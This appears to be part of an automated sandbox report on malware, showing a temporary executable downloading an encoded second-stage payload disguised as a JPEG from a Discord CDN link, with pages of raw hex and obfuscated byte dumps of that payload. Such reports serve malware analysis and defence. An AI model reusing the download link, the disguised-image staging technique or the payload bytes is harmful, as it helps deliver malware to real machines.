4f 20 71 4f 44 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 6d 20 4f 20 58 57 20 4f 20 45 70 20 4f 20 71 4f 4d 20 4f 20
                                                            Data Ascii: qqW O EO O Wm O DM O WD O DM O DW O DW O DW O Wp O EJ O MX O qOp O DD O Xq O Xq O DD O mM O DE O DX O qOE O qOO O qqX O DW O EO O DD O DW O EJ O XJ O Wp O ME O DD O qOp O DE O DW O DW O DE O EX O qOm O qOq O qOD O WW O mE O mE O WE O Xm O XW O Ep O qOM O
                                                            2021-10-29 18:10:39 UTC791INData Raw: 4f 70 20 4f 20 44 4d 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 45 70 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 45 45 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 58 71 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 58 57 20 4f 20 71 71 4d 20 4f 20 57 4a 20 4f 20 71 71 57 20 4f 20 45 4a 20 4f 20 71 4f 6d 20 4f 20 4d 4d 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 45 20 4f 20 71 4f 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 45 4f 20 4f 20 4d 4d 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 58 20 4f 20 45 6d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 58 45 20 4f 20 71 4f 44 20 4f 20 58 58 20 4f 20 4d 4d 20 4f 20 71 71 71 20 4f 20 57 6d 20 4f 20 45 4d 20 4f
                                                            Data Ascii: Op O DM O qOW O XW O qOp O Ep O qOW O XW O qOp O EE O qOW O XW O qOp O Xq O qOW O XW O qOp O XW O qqM O WJ O qqW O EJ O qOm O MM O DD O mX O DE O qOX O DX O mE O EO O MM O qJJ O DW O Xq O DW O DE O DX O Em O qqM O DD O XE O qOD O XX O MM O qqq O Wm O EM O
                                                            2021-10-29 18:10:39 UTC807INData Raw: 57 20 4f 20 58 45 20 4f 20 58 4d 20 4f 20 6d 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 58 71 20 4f 20 71 4f 45 20 4f 20 44 4d 20 4f 20 45 71 20 4f 20 71 71 71 20 4f 20 44 44 20 4f 20 4d 45 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 44 45 20 4f 20 58 71 20 4f 20 58 4d 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 58 71 20 4f 20 71 4f 45 20 4f 20 45 71 20 4f 20 58 4f 20 4f 20 57 44 20 4f 20 58 44 20 4f 20 44 58 20 4f 20 45 45 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 45 58 20 4f 20 58 44 20 4f 20 71 4f 57 20 4f 20 6d 70 20 4f 20 71 4a 4f 20 4f 20 58 4a 20 4f 20 58 44 20 4f 20 71 4f 4d 20 4f 20 71 4f 70 20 4f 20 71 4f 4a 20 4f 20 44
                                                            Data Ascii: W O XE O XM O mM O DM O DW O DW O Em O Xq O mE O Wq O Xq O qOE O DM O Eq O qqq O DD O ME O qOp O DX O mE O qOO O DE O Xq O XM O mE O Wq O Xq O qOE O Eq O XO O WD O XD O DX O EE O DD O DW O DW O EE O EX O XD O qOW O mp O qJO O XJ O XD O qOM O qOp O qOJ O D
                                                            2021-10-29 18:10:39 UTC823INData Raw: 71 4f 4a 20 4f 20 71 71 4d 20 4f 20 71 4f 70 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 58 44 20 4f 20 45 58 20 4f 20 58 44 20 4f 20 58 44 20 4f 20 71 4f 58 20 4f 20 71 4f 71 20 4f 20 45 44 20 4f 20 6d 70 20 4f 20 58 4d 20 4f 20 71 71 44 20 4f 20 45 4a 20 4f 20 44 4d 20 4f 20 45 70 20 4f 20 57 4f 20 4f 20 58 4f 20 4f 20 71 4f 71 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4d 20 4f 20 71 4f 57 20 4f 20 4d 58 20 4f 20 71 4f 6d 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 57 20 4f 20 57 44 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 45 44 20 4f 20 57 4a 20 4f 20 58 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 71 71 4a 20 4f 20 71 4f 58 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 4d 4d 20 4f 20
                                                            Data Ascii: qOJ O qqM O qOp O qOp O DW O XW O XD O EX O XD O XD O qOX O qOq O ED O mp O XM O qqD O EJ O DM O Ep O WO O XO O qOq O DW O EE O DW O DW O EM O qOW O MX O qOm O qOJ O mE O mE O qOW O WD O mE O qqq O ED O WJ O XX O mE O mE O WO O qqJ O qOX O mE O Wq O MM O
                                                            2021-10-29 18:10:39 UTC839INData Raw: 6d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 6d 4d 20 4f 20 45 4f 20 4f 20 71 4a 71 20 4f 20 45 4f 20 4f 20 44 45 20 4f 20 45 58 20 4f 20 71 71 44 20 4f 20 71 4a 4f 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 6d 20 4f 20 57 6d 20 4f 20 45 4f 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 71 71 20 4f 20 58 44 20 4f 20 45 58 20 4f 20 6d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 6d 4d 20 4f 20 45 4f 20 4f 20 71 4a 71 20 4f 20 45 4f 20 4f 20 44 45 20 4f 20 45 58 20 4f 20 71 71 44 20 4f 20 71 4a 4f 20 4f 20 71 4f 70 20 4f 20 45 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 58 6d 20 4f 20 57 6d 20 4f 20 44 58 20 4f 20 57 57 20 4f 20 6d
                                                            Data Ascii: mM O DW O DW O Ep O mM O EO O qJq O EO O DE O EX O qqD O qJO O qOp O DM O DW O DW O DD O Xm O Wm O EO O XO O mp O mE O mE O WE O qqq O XD O EX O mM O DW O DW O Ep O mM O EO O qJq O EO O DE O EX O qqD O qJO O qOp O Eq O DW O DW O DD O Xm O Wm O DX O WW O m
                                                            2021-10-29 18:10:39 UTC855INData Raw: 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 45 44 20 4f 20 71 4f 44 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 45 57 20 4f 20 57 4a 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 71 71 45 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 44 20 4f 20 71 4f 44 20 4f 20 71 4f 44 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4a 4a 20 4f 20 71 71 45 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4a 4a 20 4f 20 71 4f 44 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 58 4d 20 4f 20 57 4a 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 71 71 45 20 4f 20 45 45 20 4f
                                                            Data Ascii: E O DW O DW O EO O ED O qOD O DW O DW O DD O EW O WJ O qqM O DW O DW O Xq O qqE O EE O DW O DW O ED O qOD O qOD O DW O DW O DX O DW O WJ O qqM O DW O DW O qJJ O qqE O EE O DW O DW O Eq O qJJ O qOD O DW O DW O DX O XM O WJ O qqM O DW O DW O EX O qqE O EE O
                                                            2021-10-29 18:10:39 UTC863INData Raw: 20 58 71 20 4f 20 44 44 20 4f 20 45 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 71 71 6d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 71 4f 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 4f 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f
                                                            Data Ascii: Xq O DD O EX O DW O Eq O DM O DW O MM O qqM O DD O qqm O DW O DW O DW O DW O DW O DW O DD O DX O DW O Eq O WD O DW O MX O Xq O DD O qqM O DW O Eq O DM O DW O qOO O DW O DW O WO O DW O DX O Xq O DW O EE O DW O DW O mX O DW O DX O qOp O DW O EE O DW O DW O
                                                            2021-10-29 18:10:39 UTC879INData Raw: 4f 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 6d 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 71 4f 58 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 44 57 20 4f 20
                                                            Data Ascii: O O qOp O DW O DW O DW O DX O qqM O DW O ME O Xq O DD O mX O DW O Eq O XW O DW O MX O Xq O DW O mp O DW O DW O mX O DW O DE O qOp O DW O DW O DW O DW O DW O DW O XO O DW O DW O qOX O DW O EJ O EE O DW O XO O qOp O DW O qOX O DW O EJ O EE O DW O XO O DW O
                                                            2021-10-29 18:10:39 UTC895INData Raw: 4f 20 4d 4f 20 4f 20 58 44 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 58 20 4f 20 71 4f 4f 20 4f 20 45 4f 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4f 58 20 4f 20 4d 4d 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 58 57 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 6d 4d 20 4f 20 71 4f 58 20 4f 20 4d 4d 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 57 71 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 4d 58 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 58 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 71 45 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 4d 58
                                                            Data Ascii: O MO O XD O MM O DW O DW O DM O qOO O qOX O qOO O EO O DD O qJq O MX O WO O EX O qOX O MM O Wq O EX O XW O ME O XE O mM O qOX O MM O qqM O DD O Wq O DW O Eq O qOE O DW O MX O qOp O DD O qJJ O DW O EJ O Xq O DW O XM O Xq O DW O qqE O DW O Eq O Xq O DW O MX
                                                            2021-10-29 18:10:39 UTC911INData Raw: 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4a 4a 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 45 58 20 4f 20 71 71 44 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 6d 4d 20 4f 20 71 71 4d 20 4f 20 45 6d 20 4f 20 71 71 44 20 4f 20 58 4d 20 4f 20 58 45 20 4f 20 71 4a 4f 20 4f 20 71 71 57 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 71 4f 4f 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 71 4a 4a 20 4f 20 71 4f 4f 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 6d 4d 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 4d 4d 20 4f 20 44 57 20 4f 20 71 4f 4d 20 4f 20 6d 4d 20 4f 20 71 4f 58 20 4f 20 4d 58 20 4f 20 58 45 20 4f 20 45 58 20 4f 20
                                                            Data Ascii: qOJ O qOO O WO O EX O qJJ O ME O XE O EX O qqD O MM O DW O DW O DW O mM O qqM O Em O qqD O XM O XE O qJO O qqW O MX O WO O EE O DW O DW O DX O qOp O DX O qOO O WO O EX O qJJ O qOO O Eq O WE O mM O MX O DW O DX O MM O DW O qOM O mM O qOX O MX O XE O EX O
                                                            2021-10-29 18:10:39 UTC927INData Raw: 4f 20 44 44 20 4f 20 58 6d 20 4f 20 58 45 20 4f 20 45 4f 20 4f 20 71 71 4d 20 4f 20 58 44 20 4f 20 57 4f 20 4f 20 71 4f 58 20 4f 20 71 71 45 20 4f 20 4d 4f 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 57 71 20 4f 20 58 57 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 71 71 4a 20 4f 20 4d 58 20 4f 20 71 71 4f 20 4f 20 58 4a 20 4f 20 71 4a 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 4d 20 4f 20 44 44 20 4f 20 58 4a 20 4f 20 57 4f 20 4f 20 58 44 20 4f 20 6d 58 20 4f 20 58 4a 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 4f 70 20 4f 20 45 6d 20 4f 20 58 70 20 4f 20 4d 4f 20 4f 20 58 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 58 20 4f 20 58 4d 20 4f 20 58 58 20 4f 20 45 58 20 4f 20 71 4f 58 20 4f 20 58 4a 20 4f 20 44 4d 20 4f 20 45 45 20 4f 20 44 57
                                                            Data Ascii: O DD O Xm O XE O EO O qqM O XD O WO O qOX O qqE O MO O Eq O WE O Wq O XW O Eq O WE O qqJ O MX O qqO O XJ O qJJ O DW O DW O qqM O DD O XJ O WO O XD O mX O XJ O DM O EE O DW O EW O qOp O Em O Xp O MO O XE O qJO O qOX O XM O XX O EX O qOX O XJ O DM O EE O DW
                                                            2021-10-29 18:10:39 UTC943INData Raw: 4f 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 71 71 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 71 20 4f 20 44 44 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 45 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 44 4d 20
                                                            Data Ascii: OE O DW O DW O DW O DW O qOp O DD O DW O DE O DW O EW O qOp O DW O DW O DW O DX O qOp O DM O DW O Ep O DW O qqW O DW O DW O DW O DW O XW O DW O Xq O DW O qOp O DE O mX O DW O DW O DW O DD O qqq O DD O DW O DE O DW O ED O qqM O DW O DW O DW O Ep O DW O DM
                                                            2021-10-29 18:10:39 UTC959INData Raw: 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 4d 58 20 4f 20 58 4a 20 4f 20 57 4a 20 4f 20 57 70 20 4f 20 71 4f 57 20 4f 20 57 45 20 4f 20 44 57 20 4f 20 57 70 20 4f 20 71 4f 57 20 4f 20 57 45 20 4f 20 44 57 20
                                                            Data Ascii: DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O WJ O MX O XJ O WJ O Wp O qOW O WE O DW O Wp O qOW O WE O DW
                                                            2021-10-29 18:10:39 UTC975INData Raw: 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 57 57 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 71 4f 70 20 4f 20 45 70 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 57 57 20 4f 20 4d 4d 20 4f 20 58 70 20 4f 20 45 6d 20 4f 20 57 4a 20 4f 20 71 4f 4d 20 4f 20 71 71 71 20 4f 20 57 70 20 4f 20 57 4a 20 4f 20 71 4f 4d 20 4f 20 71 71 71 20 4f 20 57 70 20 4f 20 57 4a 20 4f 20 71 4f 4d 20 4f 20 71 71 71 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 45 70 20 4f 20 44 45 20 4f 20
                                                            Data Ascii: WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O mE O mE O WD O DW O WW O Eq O XW O qOp O qOp O Ep O DE O DW O WW O MM O Xp O Em O WJ O qOM O qqq O Wp O WJ O qOM O qqq O Wp O WJ O qOM O qqq O Wp O qOp O Ep O DE O
                                                            2021-10-29 18:10:39 UTC991INData Raw: 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 45 45 20 4f 20 71 4a 71 20 4f 20 71 71 44 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 20 4f 20 57 4a 20 4f 20 57 57 20 4f 20 71 4a 71 20 4f 20 71 4f 58 20 4f
                                                            Data Ascii: DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O WE O EE O qJq O qqD O WJ O WW O qJq O qOX O WJ O WW O qJq O qOX O WJ O WW O qJq O qOX O WJ O WW O qJq O qOX O


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.549805162.159.130.233443C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-29 18:10:39 UTC1000OUTGET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1
                                                            Host: cdn.discordapp.com
                                                            2021-10-29 18:10:39 UTC1001INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:10:39 GMT
                                                            Content-Type: image/jpeg
                                                            Content-Length: 257637
                                                            Connection: close
                                                            CF-Ray: 6a5e5ca668936993-FRA
                                                            Accept-Ranges: bytes
                                                            Age: 31399
                                                            Cache-Control: public, max-age=31536000
                                                            ETag: "3943342e1b45e890a729310467090869"
                                                            Expires: Sat, 29 Oct 2022 18:10:39 GMT
                                                            Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT
                                                            Vary: Accept-Encoding
                                                            CF-Cache-Status: HIT
                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Cf-Bgj: h2pri
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            x-goog-generation: 1635499591484284
                                                            x-goog-hash: crc32c=wAW+lg==
                                                            x-goog-hash: md5=OUM0LhtF6JCnKTEEZwkIaQ==
                                                            x-goog-metageneration: 1
                                                            x-goog-storage-class: STANDARD
                                                            x-goog-stored-content-encoding: identity
                                                            x-goog-stored-content-length: 257637
                                                            X-GUploader-UploadID: ADPycdsh_0GH4h67GfM4DXv45AAKX5J9KadQOaoJgeenVA8XggFohgRrUig2qws-RHRUWddueA29G7svcIC2IfMWyq3dEjwegQ
                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W0xzWLAqrPeHaYaY3W1VVRK03xcaTsmWIKoB6MzimTEZq6D4QDX7cgpUDhxBDo9cprGZAJsrF8YBUdR7whdI%2BTzdI8xsUDQ%2BZTDKfCyRwznO4TCgHdvOnXdfplyWC%2FOdAGzKGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            2021-10-29 18:10:39 UTC1002INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                            2021-10-29 18:10:39 UTC1002INData Raw: 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71
                                                            Data Ascii: O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O q
                                                            2021-10-29 18:10:39 UTC1003INData Raw: 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 4f 20 4f 20 58 45 20 4f 20 57 4f 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4f 44 20 4f 20 71 4f 70 20 4f 20 71 71 4d 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 58 6d 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 4d 4d 20 4f 20 6d 45 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 71 71 4f 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 45 4a 20 4f 20 44 4d 20 4f 20 58 4f 20 4f 20 71 71 4a 20 4f 20 44 58 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4a 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 57 4f 20 4f 20 71 4f 6d 20 4f 20 45 4a 20 4f 20 58 58 20 4f 20 71 71 4f 20 4f 20 6d 45 20 4f 20 71 71 4a 20 4f 20 71 4f
                                                            Data Ascii: O O WW O qqM O mE O WE O XO O XE O WO O mE O mp O qOD O qOp O qqM O DX O mE O Xm O DE O mX O MM O mE O Eq O XW O qqO O EX O qqX O qOO O qOW O EJ O DM O XO O qqJ O DX O Xq O XW O EJ O qqJ O qOp O DW O DW O DW O DE O WO O qOm O EJ O XX O qqO O mE O qqJ O qO
                                                            2021-10-29 18:10:39 UTC1005INData Raw: 4f 20 57 70 20 4f 20 57 6d 20 4f 20 71 71 4f 20 4f 20 71 71 57 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 71 45 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 6d 20 4f 20 45 4d 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20
